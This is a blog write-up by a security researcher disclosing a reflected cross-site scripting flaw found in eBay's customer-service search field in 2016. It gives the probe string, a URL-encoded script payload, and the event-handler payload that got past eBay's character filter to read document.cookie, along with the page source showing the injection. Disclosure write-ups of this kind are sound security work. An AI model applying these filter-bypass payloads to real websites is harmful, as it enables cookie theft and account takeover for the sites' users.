Pentester Nepal
Published in

Pentester Nepal

ByPassing eBay XSS Protection

Hi, there today I want to share small proof of concept regarding “Reflective Cross-Site Scripting [ R-XSS ]” which I had found on eBay back in 2016. I am not an active participant in bug bounty programs, but one day I had finished all my office works so I was surfing on Facebook and received a message from my brother, Samir, asking for advice regarding some musical instruments. The message contained an eBay link. Once on eBay, I logged into the site to view details and suddenly noticed the “Help & Contact” menu, I followed that menu and went to the “Customer Service” page where I saw a search field, I decided to check for “Cross-Site Scripting [ XSS ]” vulnerability and unexpectedly found POST type R-XSS.

Testing For XSS

As all security researchers do, I also have certain pathways to find vulnerabilities. I always use’>Test12345<“ as it contains a number, letter, and syntax. This allows me to see how a website handles user inputs. Some questions like “is the user input sanitized? how sensitive is user input?” can be answered from this idea.

Finding XSS

Once I noticed the “Customer service” page with a search field, I used that specific text in the field. I noticed that the value was being reflected without [ >< “ ]. I immediately figured out that eBay must have been replacing those syntaxes in White Space. The output in View-Source was like below:

<input type=”text” id=”query“ role=”combobox” name=”query” value=”‘ Test12345 ” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=”‘ Test12345 ” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

To test and understand the application further, I used this payload “/><script>alert(1);</script><input type=”

however, the syntax was still filtered by eBay. So I encoded it in URL ENCODE format:

%22%2f%3E%3Cscript%3Ealert%281%29%3B%3C%2fscript%3E%3Cinput%20type%3D%22

After that the page source for that specific part was as follow:

<input type=”text” id=”query“ role=”combobox” name=”query” value=”” script alert 1 script input type=”” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=”” script alert 1 script input type=”” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

By seeing this, I realized that eBay was also filtering URL encoded syntax except for %22 & %3D which decoded value is and =

After these research were made, I tweaked my payload a little to: %22 onMouseOver=%22prompt(document.cookie) which decodes to “ onMouseOver=“prompt(document.cookie)

Finally, after this, the XSS attack was successful and all was good to go.

<input type=”text” id=”query“ role=”combobox” name=”query” value=” ” onMouseOver=”prompt(document.cookie)” title=”Search by help topic, keywords, or phrases” aria-expanded=”false” aria-autocomplete=”list” aria-activedescendant=”” aria-value=” ” onMouseOver=”prompt(document.cookie)” autocomplete=”off” aria-owns=”popup” class=”dText3“></input>

Almost all eBay domains were vulnerable at that time including eBay.in, eBay.com.au etc

Reply From eBay Security Team
Acknowledgment By eBay
Video POC

Thank you all for reading this write-up. Please feel free to ask if you have any confusion about this article and if I had made any mistake please leave a comment 🙂 or message me on Twitter.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store